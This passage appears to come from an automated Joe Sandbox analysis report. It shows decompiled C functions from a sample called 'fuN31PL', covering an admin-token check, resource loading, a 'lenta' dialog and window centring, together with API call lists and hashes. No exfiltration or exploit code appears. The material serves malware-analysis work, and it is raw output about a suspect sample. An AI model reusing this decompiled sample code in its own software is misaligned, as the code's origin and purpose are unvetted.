                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001A18DD), ref: 001A181A
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001A182C
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: AllocateAndInitializeSid.ADVAPI32(001A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A18DD), ref: 001A1855
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: FreeSid.ADVAPI32(?,?,?,?,001A18DD), ref: 001A1883
                                                                                                                                                                                                                                                • Part of subcall function 001A17EE: FreeLibrary.KERNEL32(00000000,?,?,?,001A18DD), ref: 001A188A
                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 001A18EB
                                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 001A18F2
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 001A190A
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 001A1918
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000000,?,?), ref: 001A192C
                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 001A1944
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001A1964
                                                                                                                                                                                                                                              • EqualSid.ADVAPI32(00000004,?), ref: 001A197A
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?), ref: 001A199C
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 001A19A3
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A19AD
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2168512254-0
                                                                                                                                                                                                                                              • Opcode ID: 9f9119cc419719ea2a2bfb5e7983a60c8676aa3f64248d5843a1f6930e365e90
                                                                                                                                                                                                                                              • Instruction ID: 2c1ffd6aec99af169173cfb6688a75c1f0d5697a831e1b0f0f43e31a0318eda4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f9119cc419719ea2a2bfb5e7983a60c8676aa3f64248d5843a1f6930e365e90
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB313B75A0020ABFDB209FA5DD98ABFBBBDFF0A714F500429F645D2160DB309945CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E001A468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				CHAR* _t14;
                                                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                                                              				long _t16;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                                                                                                              				_t11 = __edx;
                                                                                                                                                                                                                                              				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                                                              				_t16 = _t4;
                                                                                                                                                                                                                                              				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                                                              					if(_t16 == 0) {
                                                                                                                                                                                                                                              						L5:
                                                                                                                                                                                                                                              						return 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                                                              					FreeResource(_t15);
                                                                                                                                                                                                                                              					return _t16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                              • memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: TITLE$lenta
                                                                                                                                                                                                                                              • API String ID: 3370778649-2035842925
                                                                                                                                                                                                                                              • Opcode ID: 2e8b69935e318187d66fb3888982c263a33a284219ea517af8865e210013b36a
                                                                                                                                                                                                                                              • Instruction ID: 5158c0272543fe639208d0bdf628e6c4c5f4ef80567ea20615889ec0e3f07e40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e8b69935e318187d66fb3888982c263a33a284219ea517af8865e210013b36a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B0186762443107BE3201BA55D4DF7B7E2CDFC7B52F444014FA4A96150CBB18881C6A6
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 57%
                                                                                                                                                                                                                                              			E001A17EE(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				short _v12;
                                                                                                                                                                                                                                              				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                                                                              				intOrPtr* _v28;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                              				long _t28;
                                                                                                                                                                                                                                              				void* _t35;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				signed int _t38;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t14 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                              				_v12 = 0x500;
                                                                                                                                                                                                                                              				_t37 = __ecx;
                                                                                                                                                                                                                                              				_v16.Value = 0;
                                                                                                                                                                                                                                              				_v28 = __ecx;
                                                                                                                                                                                                                                              				_t28 = 0;
                                                                                                                                                                                                                                              				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                              				if(_t36 != 0) {
                                                                                                                                                                                                                                              					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                              					_v20 = _t20;
                                                                                                                                                                                                                                              					if(_t20 != 0) {
                                                                                                                                                                                                                                              						 *_t37 = 0;
                                                                                                                                                                                                                                              						_t28 = 1;
                                                                                                                                                                                                                                              						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                              							_t37 = _t39;
                                                                                                                                                                                                                                              							 *0x1aa288(0, _v24, _v28);
                                                                                                                                                                                                                                              							_v20();
                                                                                                                                                                                                                                              							if(_t39 != _t39) {
                                                                                                                                                                                                                                              								asm("int 0x29");
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							FreeSid(_v24);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					FreeLibrary(_t36);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                              			}




















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,001A18DD), ref: 001A181A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 001A182C
                                                                                                                                                                                                                                              • AllocateAndInitializeSid.ADVAPI32(001A18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A18DD), ref: 001A1855
                                                                                                                                                                                                                                              • FreeSid.ADVAPI32(?,?,?,?,001A18DD), ref: 001A1883
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,001A18DD), ref: 001A188A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                              • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                              • Opcode ID: 76b987084960780573a16285f62507da1d123c54542c7c336efaaec1773a9503
                                                                                                                                                                                                                                              • Instruction ID: 197f8d0d75e1d1d817cd92553016db909f865065f030afa1f2073a2cec60572b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76b987084960780573a16285f62507da1d123c54542c7c336efaaec1773a9503
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211B675E00209BFDB119FA4ED49ABEBB78EF4A710F500169FA01E3290DB309D44CB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A3450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				int _t22;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                              				if(_t7 == 0) {
                                                                                                                                                                                                                                              					EndDialog(_a4, 2);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                              				if(_t11 == 0) {
                                                                                                                                                                                                                                              					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                              					_t24 = _a4;
                                                                                                                                                                                                                                              					E001A43D0(_t24, _t12);
                                                                                                                                                                                                                                              					SetWindowTextA(_t24, "lenta");
                                                                                                                                                                                                                                              					SetDlgItemTextA(_t24, 0x838,  *0x1a9404);
                                                                                                                                                                                                                                              					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t11 == 1) {
                                                                                                                                                                                                                                              					_t22 = _a12;
                                                                                                                                                                                                                                              					if(_t22 < 6) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 <= 7) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                              						return 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t22 != 0x839) {
                                                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a91dc = 1;
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                                                              			}









                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • EndDialog.USER32(?,?), ref: 001A3490
                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 001A349A
                                                                                                                                                                                                                                              • SetWindowTextA.USER32(?,lenta), ref: 001A34B2
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000838), ref: 001A34C4
                                                                                                                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 001A34CB
                                                                                                                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 001A34D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                              • String ID: lenta
                                                                                                                                                                                                                                              • API String ID: 852535152-2780258678
                                                                                                                                                                                                                                              • Opcode ID: d8273c8e425cf6e0dd3735b771a2ea270871ee0d9eec7d50b3e991fa5f8f7daf
                                                                                                                                                                                                                                              • Instruction ID: 6b772b8e4a1a071f80b63af1a7869c7710440b4b10dfb99e5ce8eeb687cfec49
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8273c8e425cf6e0dd3735b771a2ea270871ee0d9eec7d50b3e991fa5f8f7daf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB01B139240114ABC72A5F68DC0CAAD3A64EF0F750F504010FA66869A0CB749FC2DB91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E001A2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				char _t32;
                                                                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                                                                              				char _t42;
                                                                                                                                                                                                                                              				char* _t44;
                                                                                                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                                                                                                              				intOrPtr* _t55;
                                                                                                                                                                                                                                              				CHAR* _t59;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				CHAR* _t64;
                                                                                                                                                                                                                                              				CHAR* _t65;
                                                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t60 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                              				_t65 = _a4;
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t64 = __ecx;
                                                                                                                                                                                                                                              				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                              					GetModuleFileNameA( *0x1a9a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_t17 =  *_t64;
                                                                                                                                                                                                                                              						if(_t17 == 0) {
                                                                                                                                                                                                                                              							break;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                              						 *_t65 =  *_t64;
                                                                                                                                                                                                                                              						if(_t21 != 0) {
                                                                                                                                                                                                                                              							_t65[1] = _t64[1];
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                              							L19:
                                                                                                                                                                                                                                              							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                              								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                              									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                              										goto L19;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									E001A1680(_t65, E001A17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              									_t52 = _t65;
                                                                                                                                                                                                                                              									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                              									_t60 = _t14;
                                                                                                                                                                                                                                              									do {
                                                                                                                                                                                                                                              										_t32 =  *_t52;
                                                                                                                                                                                                                                              										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                              									} while (_t32 != 0);
                                                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								E001A65E8( &_v268);
                                                                                                                                                                                                                                              								_t55 =  &_v268;
                                                                                                                                                                                                                                              								_t62 = _t55 + 1;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t34 =  *_t55;
                                                                                                                                                                                                                                              									_t55 = _t55 + 1;
                                                                                                                                                                                                                                              								} while (_t34 != 0);
                                                                                                                                                                                                                                              								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                              								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                              									 *_t38 = 0;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								E001A1680(_t65, E001A17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                              								_t59 = _t65;
                                                                                                                                                                                                                                              								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                              								_t60 = _t12;
                                                                                                                                                                                                                                              								do {
                                                                                                                                                                                                                                              									_t42 =  *_t59;
                                                                                                                                                                                                                                              									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                              								} while (_t42 != 0);
                                                                                                                                                                                                                                              								L17:
                                                                                                                                                                                                                                              								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *_t65 = _t17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                              			}























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 001A2AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 001A2AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 001A2B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 001A2B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 001A2B55
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 001A2BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 78bda8339ed3848295c2022bd7a616e69cc79a4393af94b3fc24d08899e6fec7
                                                                                                                                                                                                                                              • Instruction ID: d7696eed8a4b1b50cd713b037a04d62e481d04e7f0fff8bc5590e732933b95cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78bda8339ed3848295c2022bd7a616e69cc79a4393af94b3fc24d08899e6fec7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6841267C6082456FDB269F388C54AFD7BA99F57310F14009AE8C283642DB758E86CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}

























                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001A43F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 001A440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 001A4423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 001A442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 001A443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 001A4447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001A44A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
